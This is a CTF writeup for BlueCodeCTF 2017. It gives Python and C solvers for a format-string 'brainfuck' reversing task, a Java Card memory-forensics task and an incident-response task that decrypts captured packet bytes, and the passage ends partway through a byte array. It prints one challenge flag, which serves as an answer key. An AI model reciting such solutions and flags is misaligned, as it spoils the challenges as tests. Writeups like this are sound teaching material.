BlueCodeCTF2017 writeup

发表于 2017-11-13 | | 阅读次数:

Reversing

fs hell

printf format string brainfuck

using this script to trans the format string to pesudo c code.


prog = open('program.txt').read().split('\n')
r = dict()
w = dict()
w[6] = 'b'
w[7] = 'c'
w[8] = 'd'
w[9] = 'e'
w[10]='flag[e]'
w[13] ='cbInst'
r[1] = 'b'
r[2] = 'c'
r[3] = 'd'
r[4] = 'e'
r[5] = 'flag[e]'
r[1] = 'b'
r[11] = -1#'.if b==0'
r[12] = -2#'.if b<0'
i = -1
for x in prog:
    i+=1
    print 'label_%04X:'%i,
    if x=='':
        print ''
        continue
    assert(len(x.split('%'))>2)
    par = []
    for y in x.split("%"):
        if y=='': continue
        #print y,par
        if '*' in y:
            par.append(r[int(y[5:-2])])
        elif 'n' in y:
            addr = int(y[:y.index('$')])
            if addr==13:
                if int(par[0])==-1:
                    print "if(b==0) goto label_%04X;"%(i+2)
                elif int(par[0])==-2:
                    print "if(b<0) goto label_%04X;"%(i+2)
                else:
                    print "goto label_%04X;"%((1+i+int(par[0]))&0xffff)
            else:
                if 'hhn' in y:
                    print "*(unsigned char *)&%s=(%s)&0xff;"%(w[addr],"+".join(par))
                else:
                    if len(par)>1:
                        print "*(unsigned short *)&%s=(%s)&0xffff;"%(w[addr],"+".join(par))
                    else:
                        print "*(unsigned short *)&%s=%s&0xffff;"%(w[addr],"+".join(par))
        else:
            par.append(y[y.index('.')+1:y.index('d')])

copy the initial parameter to the front and run solver

def ror(x,bits):
    return ((x>>bits)|(x<<8-bits))&0xff
aa =  flag[288:288+39]
assert(len(aa)==39)
bb = flag[512:512+256]
assert(len(bb)==256)
f = []
y = 0
for i in range(len(aa)):
    s = (bb[aa[i]]+bb[y])&0xff
    print hex(s)
    ch = 0x100-s
    y=aa[i]
    f.append(ror(ch,i%8))
print f
print ''.join(map(chr,f))

Finally get the flag CBCTF{Do_Y0U_W4nt_MOR3_foRm4t_57RiNg5?}

One of Three Billion

Memory fornesic, but related article we got from search engine is useless, because it does not provide a open source tools. First need to build a tools to parse Java card op code.

import os
def parse(data):
    d = dict()
    d[1032] = 'func1'
    d[1025] = 'func2'
    d[258] = 'func3'
    d[260] = 'func4'
    d[263] = 'func5'
    d[521] = 'func6'
    d[772] = 'func7'
    f = dict()
    f[2160] = 'stfunc1'
    f[2276] = 'read_word'
    f[2278] = 'stfunc2'
    i = 0
    while i< len(data):
        op = data[i]
        print "%04X"%i,
        i = i + 1
        if ord(op) == 0x70:
            print "%02x %02x\t%s 0x%02x" % (ord(op), ord(data[i]), "goto ", 2+i+ord(data[i]))
            i = i + 1
        elif ord(op) == 0x28:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "astore ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x1a:
            print "%02x\t\t%s" % (ord(op), "aload_2 ")
        elif ord(op) == 0x19:
            print "%02x\t\t%s" % (ord(op), "aload_1 ")
        elif ord(op) == 0x08: 
            print "%02x\t\t%s" % (ord(op), "sconst_5 ")
        elif ord(op) == 0x10:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "bspush ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x8b:
            print "%02x %02x %02x\t%s %s" % (ord(op), ord(data[i]), ord(data[i+1]), "invokevirtual ", d[ord(data[i])<<8| ord(data[i+1])])
            i = i + 2
        elif ord(op) == 0xa8:
            print "%02x %02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), ord(data[i+1]), "goto_w ", 3+i+(ord(data[i])<<8|ord(data[i+1])))
            i = i + 2
        elif ord(op) == 0x1f:
            print "%02x\t\t%s" % (ord(op), "sload_3 ")
        elif ord(op) == 0x6a:
            print "%02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), "if_scmpeq ", 2+i+ord(data[i]))
            i = i + 1
        elif ord(op) == 0x61:
            print "%02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), "if_ne ", 2+i+ord(data[i]))
            i = i + 1
        elif ord(op) == 0x29:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "sstore ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x16:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "sload ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x11:
            print "%02x %02x %02x\t%s %d" % (ord(op), ord(data[i]), ord(data[i+1]), "sspush ", ord(data[i])<<8|ord(data[i+1]))
            i = i + 2
        elif ord(op) == 0x8d:
            print "%02x %02x %02x\t%s %s" % (ord(op), ord(data[i]), ord(data[i+1]), "invokestatic ", f[ord(data[i])<<8| ord(data[i+1])])
            i = i + 2
        elif ord(op) == 0x7b:
            print "%02x %02x %02x\t%s 0x%X" % (ord(op), ord(data[i]), ord(data[i+1]), "getstatic_a ", ord(data[i])<<8|ord(data[i+1]))
            i = i + 2
        elif ord(op) == 0x99:
            print "%02x %02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), ord(data[i+1]), "ifne_w ", 3+i+(ord(data[i])<<8|ord(data[i+1])))
            i = i + 2
        elif ord(op) == 0x55:
            print "%02x\t\t%s" % (ord(op), "sor ")
        elif ord(op) == 0x41:
            print "%02x\t\t%s" % (ord(op), "sadd ")
        elif ord(op) == 0x57:
            print "%02x\t\t%s" % (ord(op), "sxor ")
        elif ord(op) == 0x4f:
            print "%02x\t\t%s" % (ord(op), "sshr ")
        elif ord(op) == 0x4d:
            print "%02x\t\t%s" % (ord(op), "sshl ")
        elif ord(op) == 0x43:
            print "%02x\t\t%s" % (ord(op), "ssub ")
        elif ord(op) == 0x45:
            print "%02x\t\t%s" % (ord(op), "smul ") 
        elif ord(op) == 0x3:
            print "%02x\t\t%s" % (ord(op), "sconst_0 ") 
        elif ord(op) == 0x4:
            print "%02x\t\t%s" % (ord(op), "sconst_1 ")    
        elif ord(op) == 0x6:
            print "%02x\t\t%s" % (ord(op), "sconst_3 ")  
        elif ord(op) == 0x3b:
            print "%02x\t\t%s" % (ord(op), "pop ")
        elif ord(op) == 0x7a:
            print "%02x\t\t%s" % (ord(op), "return ")     
        else:
            print "unkonw: %02x" % ord(op)
            break
f = open('dump1.bin', 'rb')
ins = f.read()
f.close()
parse(ins[1:0x151])

And then write a vm can run this code.

stack = []
v = {}
v[4] = 0x5b4c
v[5] = 0x0977
v[6] = 0x5ad8
v[7] = 0x8da7
v[4] = 0x612c
v[5] = 0x4445
v[6] = 0xe078
v[7] = 0x567c
def push(x):
    stack.append(x & 0xffff)
def pop(sign = False):
    value = stack.pop(len(stack)-1)
    if value & 0x8000 and sign:
        value -= 0x10000
    return value
for line in code.split("\n"):
    s = line.split()
    assert len(s) % 2 == 1
    s = s[len(s)/2+1:]
    op = s[0]
    operands = map(lambda x:int(x, 16), s[1:])
    print op, operands
    if op == "sload":
        push(v[operands[0]])
    elif op == "sstore":
        t = pop()
        v[operands[0]] = t
    elif op == "sspush":
        push(operands[0] << 8 | operands[1])
    elif op == "bpush":
        push(operands[0])
    elif op == "sadd":
        b = pop()
        a = pop()
        push(a + b)
    elif op == "ssub":
        b = pop()
        a = pop()
        push(a - b)
    elif op == "sxor":
        b = pop()
        a = pop()
        push(a ^ b)
    elif op == "sor":
        b = pop()
        a = pop()
        push(a | b)
    elif op == "sshr":
        b = pop(True)
        a = pop(True)
        push(a >> b)
    elif op == "sshl":
        b = pop()
        a = pop()
        push(a << b)
    elif op == "smul":
        b = pop(True)
        a = pop(True)
        push(a * b)
    elif op == "sxor":
        b = pop()
        a = pop()
        push(a ^ b)
    elif op == "sconst_5":
        push(5)
    elif op == "sconst_1":
        push(1)
    elif op == "sconst_3":
        push(3)
        
    else:
        print "ERROR"
        raw_input()
    print v
    print stack
    
print map(hex, [v[4], v[5], v[6], v[7]])

Credit to 疯狂六月雪 & hen @KeenLab

Misc

Incident Response

Found some interesting respond, dump it to file and parse it as x64 asm code.
Reverse the binary and write a c program to decode the flag.

#include <stdio.h>
typedef struct
{
  int a;
  int b;
  char key[256];
}ctx;
__int64_t crypt_ctx_init(ctx *context, char *inKey)
{
  __int64_t v2; // rax@1
  __int64_t result; // rax@3
  unsigned char v4; // dl@3
  char v5; // r8@4
  context->b = 0;
  context->a = 0;
  v2 = 0LL;
  do
  {
    context->key[v2] = v2;
    ++v2;
  }
  while ( v2 != 256 );
  result = 0LL;
  v4 = 0;
  do
  {
    v5 = context->key[result];
    v4 += inKey[result & 0x1F] + context->key[result];
    context->key[result++] = context->key[v4];
    context->key[v4] = v5;
  }
  while ( result != 256 );
  return result;
}
void * decrypt(ctx *context, char *buf, __int64_t cbBuf)
{
  char *v3; // r10@1
  int v4; // edx@2
  __int64_t v5; // rax@2
  char v6; // cl@2
  __int64_t v7; // rdx@2
  __int64_t result; // rax@2
  v3 = &buf[cbBuf];
  if ( cbBuf )
  {
    do
    {
      v4 = context->b;
      v5 = (unsigned char)(context->a + 1);
      context->a = v5;
      v6 = context->key[v5];
      v7 = (unsigned char)(v6 + v4);
      context->b = v7;
      context->key[v5] = context->key[v7];
      context->key[v7] = v6;
      result = (unsigned char)context->key[(unsigned char)(context->key[v5] + v6)];
      *buf ^= result;
      ++buf;
    }
    while ( v3 != buf );
  }
  return result;
}
char peer1_2[] = { /* Packet 165 */
    0x50, 0xbd };
char peer0_3[] = { /* Packet 167 */
    0x95, 0x3b, 0x7a, 0xff, 0xd9, 0x18, 0x32, 0x3a, 
    0x33, 0x28, 0x32, 0xe1, 0x12, 0xbe, 0xec, 0xa9, 
    0x46, 0x30, 0x7d, 0x33, 0x54, 0xd5, 0x3c, 0xbd, 
    0xc4, 0xc1, 0xcc, 0x80, 0x35, 0x3a, 0x25, 0x3d, 
    0x88, 0xbf, 0x14, 0x69, 0xb7, 0xd1, 0xf3, 0x0d, 
    0x17, 0x96, 0x4c, 0xb5, 0x19, 0x5f, 0x4c, 0x7e, 
    0x15, 0xe1, 0x21, 0x5b, 0x5e, 0x24 };
    char peer1_3[] = { /* Packet 169 */
        0x10, 0xb6, 0xf8 };
        char peer0_4[] = { /* Packet 170 */
        0x48, 0xc8, 0x0c, 0x81, 0x3a, 0xce, 0x27, 0x92, 
        0xd4, 0xbd, 0x18, 0x75, 0x1b, 0xbb, 0xfc, 0x49, 
        0x15 };
        char peer1_4[] = { /* Packet 172 */
        0x3c, 0x18, 0x14, 0xac, 0x38, 0xa9 };
        char peer0_5[] = { /* Packet 173 */
        0x1d, 0x3d, 0xb5, 0x74, 0xae, 0x8a, 0x02, 0x13, 
        0x87, 0x45, 0x14, 0xc1, 0x9e, 0x2d, 0xcf, 0x51, 
        0x32, 0xc0, 0xb4, 0xc6, 0x15, 0xdb, 0x67, 0x31, 
        0x36, 0x72, 0x2a, 0x2a, 0x2d, 0xad, 0x9f, 0x2f, 
        0x91, 0xf6, 0x84, 0xfe, 0xa8, 0x9d, 0x60, 0x3b, 
        0x0f, 0x9d, 0x22, 0x16, 0x5b, 0x95, 0x08, 0xe0, 
        0x8b, 0x82, 0x3a, 0x3c, 0xad, 0x69, 0x85, 0xb9, 
        0x13, 0xaa, 0xb1, 0xf3, 0xad, 0xff, 0x74, 0x72, 
        0xc8, 0x22, 0xf0, 0x86, 0xd9, 0x16, 0x23, 0x3e, 
        0x6c, 0x1f, 0xfd, 0xaa, 0x5f, 0x9f, 0x43, 0xe1, 
        0x9b, 0xb4, 0x7c, 0xcd, 0xa2, 0xe9, 0xfc, 0xd0, 
        0xa8, 0xcd, 0xbe, 0x88, 0xfb, 0xa2, 0x2f, 0x39, 
        0xd0, 0xcb, 0x01, 0x4b, 0x76, 0x99, 0x15, 0xb7, 
        0x43, 0x83, 0xf6, 0xf9, 0x60, 0xb7, 0x50, 0x45, 
        0x9c, 0x9e, 0x2c, 0xa6, 0x02, 0x3b, 0xb1, 0x98, 
        0x55, 0xb4, 0x43, 0x08, 0x29, 0x1c, 0x87, 0x74, 
        0x27, 0xee, 0x2d, 0x5d, 0x32, 0x1a, 0x99, 0xba, 
        0x6b, 0x6e, 0x8a, 0xbc, 0xd1, 0x35, 0x8a, 0x5d, 
        0xf7, 0x69, 0x46, 0xc3, 0x17, 0x0a, 0xe2, 0x62, 
        0xac };
        char peer1_5[] = { /* Packet 175 */
        0xc9, 0xaf, 0x42, 0x66, 0x76, 0xee, 0x77, 0xa5, 
        0xd1, 0x0c, 0xa0, 0xa3, 0x22, 0x05, 0xb3, 0x02, 
        0x77, 0x25 };
        char peer0_6[] = { /* Packet 176 */
        0xc5, 0x49, 0x1f, 0xcb, 0x60, 0x22, 0x9b, 0x3c, 
        0x52, 0x56, 0x1f, 0x98 };
        char peer1_6[] = { /* Packet 188 */
        0x9a, 0xc5, 0x54, 0xe8, 0x17, 0x6f, 0x91, 0x7e, 
        0x59, 0xe2, 0x84, 0x01, 0xdb, 0x8e, 0xa0 };
        char peer0_7[] = { /* Packet 189 */
        0xbb, 0x7d, 0x76, 0xd7, 0x68, 0xed, 0xfc, 0x82, 
        0xc4, 0xe6, 0x9a, 0x20, 0x11, 0x33, 0xb6, 0xe2, 
        0x8a, 0x84, 0xb2, 0x1d, 0x28, 0xa2, 0xfe, 0x71, 
        0xe3, 0x8b, 0x2b, 0xaf, 0x4d, 0xec, 0x42, 0x0b, 
        0x5a, 0x61, 0x7b, 0xd1, 0xde, 0x09, 0xb4, 0x0c, 
        0x6f, 0xae, 0x70, 0x0b, 0x84, 0xee, 0xf3, 0x6a, 
        0x95, 0xd5, 0x60, 0xb1, 0x94, 0x73, 0x12, 0x88, 
        0xb3, 0x9d, 0x6b, 0x61, 0x6f, 0x17, 0xa9, 0xa1, 
        0xe3, 0x22, 0xb1, 0xf2, 0x29, 0x99, 0x05, 0x5f, 
        0xce, 0xd5, 0x01, 0xbe, 0x0c, 0xf2, 0xe2, 0xde, 
        0x13, 0x05, 0x81, 0x86, 0x90, 0xae, 0xe8, 0xa1, 
        0xe1, 0x2e, 0xee, 0x5a, 0x36, 0x4a, 0xb6, 0x1a, 
        0xed, 0xd9, 0xda, 0x4c, 0x1e, 0xa3, 0xae, 0x93, 
        0x9b, 0xbd, 0xef, 0xa2, 0x17, 0xda, 0x4d, 0x77, 
        0x64, 0x81, 0x0f, 0x87, 0xcb, 0x32, 0x1b, 0x77, 
        0x0b, 0x78, 0xfa, 0xad, 0x9d, 0x6f, 0xd1, 0x8b, 
        0xbd, 0x2a, 0x69, 0x1d, 0x45, 0x5c, 0x31, 0x92, 
        0xda, 0xe7, 0x3f, 0xa4, 0xe3, 0x39, 0x26, 0x0c, 
        0xa5, 0x7c, 0x44, 0xf3, 0x90, 0x94, 0xb7, 0xb6, 
        0xb3, 0xc4, 0x37, 0xa9, 0xe0, 0x59, 0xb7, 0x4f, 
        0xf7, 0x54, 0xb1, 0x16, 0x8e, 0x62, 0xe3, 0x81, 
        0x3d, 0x9a, 0xe9, 0xe8, 0xed, 0xac, 0xcd, 0x2a, 
        0x89, 0x7d, 0x72, 0x95, 0x97, 0x81, 0x9b, 0xba, 
        0x22, 0xfa, 0x60, 0x66, 0x37, 0x99, 0xd0, 0x45, 
        0x17, 0x9e, 0x26, 0x81, 0xb4, 0xb3, 0x0d, 0x09, 
        0x0f, 0x3f, 0x9a, 0xf4, 0xfc, 0xf5, 0xe0, 0x20, 
        0x4c, 0x33, 0x21, 0x6b, 0x0b, 0x6c, 0x15, 0x34, 
        0xd2, 0xd0, 0x7a, 0xa4, 0xff, 0xb4, 0xac, 0xd3, 
        0x9b, 0x5e, 0x45, 0x28, 0x95, 0xf6, 0x1d, 0xcb, 
        0x7b, 0x23, 0xee, 0x9d, 0x24, 0x84, 0xa0, 0xa5, 
        0x1f, 0x85, 0xd5, 0x39, 0xf9, 0x99, 0x7a, 0x44, 
        0xac, 0x83, 0x4d, 0x7c, 0x30, 0x64, 0x15, 0xa3, 
        0x32, 0xab, 0x97, 0xa6, 0x1a, 0x96, 0x3b, 0x22, 
        0xdd, 0xee, 0x16, 0x83, 0x01, 0xb1, 0xe9, 0x9c, 
        0x3a, 0x0e, 0xb2, 0x14, 0xc1, 0xb6, 0xe9, 0xad, 
        0x67, 0x2b, 0x01, 0x4a, 0xae, 0xa6, 0x5f, 0xe6, 
        0xe4, 0x43, 0xe9, 0x93, 0x9d, 0x3a, 0xf0, 0x40, 
        0xc6, 0x04, 0x8a, 0x25, 0xc3, 0xa6, 0xd0, 0xf8, 
        0x17, 0x11, 0xbd, 0xa1, 0x7c, 0x32, 0x2a, 0x83, 
        0x3e, 0xca, 0x20, 0x99, 0xd4, 0x21, 0x88, 0xa8, 
        0xa7, 0x35, 0xa4, 0xd1, 0x28, 0x06, 0x00, 0x56, 
        0xcc, 0x92, 0x6f, 0xab, 0xc1, 0xac, 0x0c, 0x84, 
        0xfe, 0x2e, 0x67, 0xe1, 0x54, 0xcc, 0x62, 0xe9, 
        0xc9, 0xe3, 0xff, 0x79, 0x15, 0xa3, 0x1b, 0x5f, 
        0xaa, 0xc6, 0x37, 0xc9, 0x04, 0xe8, 0x1e, 0xc4, 
        0x69, 0xae, 0xe0, 0xda, 0xd7, 0x1b, 0xdc, 0x9c, 
        0x7d, 0x74, 0x8a, 0xce, 0xde, 0x16, 0x38, 0x98, 
        0xfc, 0x97, 0xcf, 0x1a, 0x69, 0x69, 0x72, 0x54, 
        0xd9, 0x39, 0x57, 0x38, 0xb4, 0xeb, 0x97, 0x0e, 
        0xf9, 0xc4, 0x4c, 0xbe, 0xfd, 0x3b, 0x75, 0xf2, 
        0xfa, 0x02, 0x0e, 0xc8, 0x36, 0x72, 0xa3, 0xe6, 
        0xc7, 0x78, 0xfc, 0xff, 0xfa, 0x51, 0x31, 0xf4, 
        0x29, 0xec, 0x15, 0x24, 0x1e, 0x72, 0x1e, 0x6e, 
        0xfb, 0x19, 0xb1, 0xbf, 0x35, 0x31, 0xfb, 0xe0, 
        0xb8, 0x32, 0x1b, 0x1e, 0xd3, 0x5f, 0xde, 0xbc, 
        0x19, 0x3b, 0xc2, 0x17, 0xdf, 0xe3, 0x2f, 0x24, 
        0x75, 0x5b, 0x5c, 0x7f, 0xce, 0x82, 0x6a, 0xe5, 
        0xae, 0x65, 0x14, 0xa0, 0x7d, 0xd1, 0x44, 0x4c, 
        0x5a, 0xcf, 0xb7, 0xca, 0x66, 0xda, 0x9e, 0xc1, 
        0xb5, 0x8d, 0x61, 0x35, 0xff, 0x45, 0x85, 0xa0, 
        0x6b, 0x7b, 0xce, 0x94, 0xe8, 0xe5, 0x5d, 0x66, 
        0x0b, 0x29, 0x7a, 0xd3, 0xfd, 0x6f, 0x94, 0x17, 
        0xc7, 0xb4, 0x1c, 0x3e, 0x62, 0xc2, 0x58, 0x9a, 
        0x34, 0x3e, 0x83, 0x2c, 0xf4, 0xd7, 0xa7, 0xa5, 
        0xd6, 0x43, 0x87, 0x4f, 0x43, 0xd7, 0xf0, 0x86, 
        0x4a, 0x48, 0xb3, 0xb3, 0x77, 0x3d, 0x4a, 0x42, 
        0xca, 0x29, 0x07, 0x1e, 0xf3, 0xf0, 0x5d, 0x52, 
        0x58, 0x2a, 0x7e, 0xbc, 0x84, 0xbc, 0xac, 0xeb, 
        0xe5, 0x50, 0x75, 0xd3, 0x3a, 0xdc, 0x46, 0x3f, 
        0x9c, 0xd6, 0x69, 0x26, 0x34, 0x9c, 0xe3, 0x8d, 
        0x44, 0x00, 0x06, 0x76, 0xbf, 0x3c, 0x83, 0x55, 
        0x41, 0x98, 0x91, 0xb2, 0x21, 0xb4, 0x73, 0xda, 
        0x47, 0x33, 0xd6, 0x6a, 0x05, 0x32, 0xb2, 0xdf, 
        0x59, 0x08, 0xaf, 0x86, 0x6c, 0xf6, 0x13, 0xdd, 
        0x2a, 0xe6, 0xb7, 0xb2, 0x74, 0x8c, 0x1e, 0x32, 
        0x88, 0x85, 0x19, 0x62, 0x8e, 0x6f, 0x60, 0xea, 
        0x64, 0xe6, 0x66, 0xdf, 0x5e, 0x14, 0x90, 0x6b, 
        0x6b, 0xb5, 0x0a, 0x90, 0x0c, 0x25, 0x05, 0xa8, 
        0xf4, 0x63, 0xb8, 0x5a, 0x52, 0xa7, 0xe3, 0x83, 
        0xd7, 0x2a, 0x77, 0xd6, 0xed, 0xa1, 0xa8, 0xf2, 
        0x93, 0x9b, 0xbf, 0xb8, 0x9b, 0x46, 0xa7, 0x69, 
        0x64, 0xbc, 0xbb, 0xbe, 0x64, 0xe5, 0xe2, 0x4b, 
        0xef, 0x3a, 0x29, 0x75, 0x7c, 0x9d, 0x9d, 0x10, 
        0x28, 0x41, 0xf2, 0xe3, 0xbe, 0xdb, 0xd8, 0xfd, 
        0xbb, 0x3b, 0xdf, 0xdc, 0xd2, 0x80, 0x83, 0x69, 
        0x25, 0x2b, 0x5b, 0x63, 0x7e, 0x05, 0xc4, 0xe8, 
        0x98, 0x5f, 0x9e, 0x80, 0xa7, 0x0c, 0x6c, 0x2e, 
        0x93, 0x28, 0x1c, 0x09, 0x35, 0x03, 0xac, 0x7b, 
        0x84, 0x6a, 0x4a, 0xa1, 0x7c, 0x6f, 0xd1, 0x5c, 
        0x3b, 0x78, 0x83, 0xa1, 0x9c, 0xf0, 0x75, 0x8b, 
        0x28, 0xdb, 0x6e, 0xc3, 0x7d, 0xb2, 0x00, 0xfa, 
        0x36, 0xb4, 0x81, 0xdd, 0x6d, 0xc1, 0xd0, 0xc2, 
        0x9a, 0xb9, 0x43, 0x8f, 0x63, 0x9e, 0xd8, 0x3f, 
        0xf9, 0x24, 0x36, 0x6b, 0xde, 0x2f, 0x48, 0xcd, 
        0xb0, 0xf1, 0x90, 0x71, 0x38, 0xc1, 0x6a, 0xc9, 
        0x9d, 0xe2, 0x7e, 0xfd, 0x3f, 0x9b, 0xdf, 0x36, 
        0x06, 0x81, 0xef, 0x8f, 0x98, 0x6e, 0x50, 0x10, 
        0xcc, 0xa1, 0x0f, 0x35, 0x49, 0x81, 0x48, 0x53, 
        0x6d, 0x98, 0xdf, 0xde, 0x32, 0xaf, 0x9d, 0x08, 
        0x0c, 0x56, 0xac, 0xf7, 0xc8, 0xea, 0x3a, 0x64, 
        0xfa, 0x6f, 0x50, 0x76, 0x63, 0xe8, 0x47, 0x39, 
        0x95, 0x88, 0x74, 0x76, 0xb8, 0x50, 0x70, 0x38, 
        0x06, 0x59, 0xe8, 0x8e, 0x5e, 0x0f, 0xe6, 0xd2, 
        0xca, 0x6f, 0xee, 0x80, 0x5e, 0xc4, 0xe6, 0x2a, 
        0x6c, 0xe6, 0xa6, 0x1d, 0x09, 0xe9, 0x64, 0x31, 
        0xbb, 0xa0, 0x8b, 0xb5, 0x25, 0x55, 0x04, 0xf7, 
        0x17, 0x58, 0xea, 0x7b, 0xd9, 0xf1, 0xf5, 0x1d, 
        0x47, 0x51, 0x10, 0x1a, 0x22, 0x95, 0xe9, 0x80, 
        0x69, 0xbe, 0x0b, 0xf5, 0x25, 0xbe, 0xa5, 0xb0, 
        0x6e, 0xc3, 0x7e, 0xc9, 0x8c, 0x2a, 0xb9, 0xee, 
        0x94, 0x50, 0x33, 0x62, 0xb6, 0xc0, 0x6d, 0xc7, 
        0xa9, 0xb5, 0xaa, 0xeb, 0x09, 0x45, 0x98, 0x3f, 
        0x1b, 0xe8, 0x37, 0x5f, 0x21, 0x30, 0xc0, 0xb0, 
        0xa9, 0xc5, 0x7f, 0xaa, 0xa9, 0x55, 0x93, 0x42, 
        0x67, 0xe3, 0x6f, 0x75, 0x90, 0xcf, 0x86, 0xa0, 
        0xb6, 0x0f, 0x3f, 0xb2, 0xbe, 0xa4, 0x92, 0x40, 
        0x19, 0x3b, 0x01, 0xde, 0xc9, 0x2f, 0x5e, 0x9d, 
        0x09, 0xa1, 0x6b, 0x65, 0x45, 0xdc, 0x85, 0xd7, 
        0x5a, 0xef, 0x9a, 0x7f, 0x9f, 0x74, 0x41, 0x55, 
        0xbb, 0x02, 0xdb, 0x4c, 0x11, 0x59, 0xf9, 0x1c, 
        0xb4, 0x5b, 0x74, 0x80, 0x1d, 0xe9, 0x78, 0xa1, 
        0xb6, 0x7c, 0xf1, 0xe4, 0x21, 0x89, 0x9b, 0x46, 
        0xec, 0x99, 0x7f, 0x72, 0xac, 0x02, 0xc6, 0x2f, 
        0x08, 0x22, 0xee, 0x11, 0x77, 0xa4, 0xd2, 0x5a, 
        0x91, 0x34, 0x52, 0xe2, 0x4c, 0x46, 0xa2, 0x78, 
        0xff, 0x87, 0xa0, 0xe3, 0x73, 0x91, 0x17, 0x18, 
        0x7c, 0xa8, 0x92, 0x2b, 0x60, 0xc2, 0x46, 0xe7, 
        0xa0, 0x4c, 0xc9, 0x63, 0xbb, 0x2d, 0xc7, 0x25, 
        0xeb, 0x96, 0xf6, 0xb4, 0x5f, 0xe1, 0x99, 0xca, 
        0xf2, 0x90, 0xcb, 0x4a, 0x96, 0x5d, 0x5b, 0xd7, 
        0x0d, 0xaf, 0x46, 0x5b, 0xa6, 0xc0, 0x02, 0x30, 
        0x2c, 0x17, 0x49, 0x64, 0x5c, 0xa3, 0x1d, 0xfd, 
        0x45, 0x16, 0x1d, 0x3f, 0x34, 0x1e, 0xab, 0xd2, 
        0x71, 0xb9, 0x15, 0x34, 0x01, 0xff, 0xce, 0xd0, 
        0xa1, 0x76, 0x97, 0x10, 0xa6, 0x25, 0x59, 0x7a, 
        0x76, 0x42, 0xe5, 0x19, 0x24, 0x52, 0x61, 0x0e, 
        0x31, 0x06, 0x67, 0xa7, 0x45, 0x3a, 0x34, 0xff, 
        0x36, 0xea, 0xa0, 0xc9, 0x4a, 0xde, 0x4f, 0x3e, 
        0x95, 0x99, 0x5f, 0x6a, 0xc9, 0x88, 0xb2, 0xa6, 
        0xc4, 0x3e, 0xd1, 0xfb, 0x0e, 0x9a, 0x03, 0xc6, 
        0x0e, 0x0e, 0x72, 0x77, 0x6c, 0x70, 0xe2, 0x35, 
        0x74, 0x5f, 0x23, 0x3c, 0x05, 0x1b, 0x28, 0xf9, 
        0xec, 0x12, 0xce, 0x54, 0x13, 0x04, 0xf5, 0xdb, 
        0x22, 0xea, 0x0c, 0xc0, 0xc0, 0x91, 0xe2, 0x4f, 
        0x27, 0xba, 0x17, 0xf8, 0xa5, 0x03, 0x8a, 0xe1, 
        0x6f, 0x56, 0xb4, 0xcb, 0xda, 0x08, 0x6a, 0x2d, 
        0x46, 0x1a, 0x1d, 0x0f, 0xbf, 0xe3, 0xcf, 0x5d, 
        0x92, 0xc1, 0x7c, 0x05, 0xa8, 0x78, 0x0c, 0x56, 
        0x52, 0x7f, 0x77, 0x54, 0xd6, 0x4f, 0xac, 0x79, 
        0xa0, 0x3d, 0x56, 0xe2, 0xe8, 0xf3, 0xd3, 0x41, 
        0x52, 0xfa, 0xd2, 0x0b, 0xd0, 0x60, 0x60, 0xc0, 
        0xde, 0x7b, 0x6e, 0x9c, 0x0f, 0xf4, 0x8d, 0x4b, 
        0x82, 0x21, 0xaf, 0x5b, 0xa9, 0x0b, 0x4f, 0xdb, 
        0x69, 0xec, 0xec, 0x81, 0x87, 0x65, 0x7a, 0xa2, 
        0x0b, 0xff, 0x61, 0x1c, 0x5e, 0x98, 0xca };
        char peer1_7[] = { /* Packet 191 */
        0xaa, 0x42, 0x5a, 0xa7, 0xd0, 0x96, 0xa9, 0x35 };
        char peer0_8[] = { /* Packet 192 */
        0x62, 0x99, 0x64, 0x48, 0x89, 0xfd, 0x62, 0x15, 
        0xa8, 0x93, 0x3b, 0x28, 0x65, 0xce, 0x6c, 0xa2, 
        0xc0, 0x38, 0x80, 0xc9, 0xae, 0x45, 0xa8, 0x1f, 
        0x6e, 0xb8, 0xaa, 0x81, 0x08, 0xe6, 0x13, 0x57, 
        0xe3, 0x9b, 0xa8, 0xdc, 0x91, 0x9a, 0xff, 0xbb, 
        0x9a, 0x67, 0x37, 0x99, 0x73, 0x63, 0x52, 0x5c, 
        0xfd, 0xcf, 0x20, 0x6c, 0xd6, 0x88, 0xe8, 0x9a, 
        0x2f, 0xbf, 0x93, 0xa8, 0x5f, 0xc2, 0x01, 0x50, 
        0xd4, 0xd4, 0xf2, 0xfb, 0x96, 0x67, 0x35, 0x99, 
        0xdc, 0x6c, 0x79, 0xe8, 0x3c, 0xf5, 0x17, 0xa8, 
        0x28, 0x80, 0x66, 0x51, 0x14, 0xa8, 0x5f, 0xc5, 
        0x02, 0x5e, 0x98, 0x47, 0x57, 0x62, 0x85, 0x7c, 
        0xa4, 0xbf, 0x40, 0xfe, 0x75, 0x8c, 0x55, 0x96, 
        0x26, 0x89, 0xa1, 0x60, 0x12, 0x94, 0x5f, 0x76, 
        0x44, 0x97, 0x7a, 0x0a, 0x90, 0x28, 0xff, 0x41, 
        0x07, 0x08, 0x94, 0x3b, 0x0e, 0x61, 0x83, 0x73, 
        0x20, 0x96, 0x6f, 0xe9, 0x80, 0x75, 0x69, 0x9a, 
        0x31, 0xf4, 0xf5, 0x6a, 0x65, 0xa6, 0x5e, 0x17, 
        0x7b, 0x74, 0x5a, 0xf0, 0xfa, 0x3d, 0x3d, 0x96, 
        0xde, 0x5a, 0x81, 0xae, 0x6b, 0x97, 0xde, 0xd5, 
        0x11, 0x1c, 0xd0, 0x41, 0xbe, 0xfb, 0xae, 0xb7, 
        0x46, 0x63, 0x72, 0xa2, 0x1e, 0x67, 0x35, 0x4d, 
        0xf3, 0xef, 0x64, 0x2a, 0x78, 0x97, 0x89, 0xd3, 
        0x71, 0xc7, 0x82, 0xd1, 0x42, 0x58, 0x08, 0xbe, 
        0x40, 0x63, 0xe0, 0xd8, 0x90, 0x3e, 0x86, 0x59, 
        0x25, 0xf1, 0x5c, 0xf9, 0x13, 0xdc, 0x41, 0x9c, 
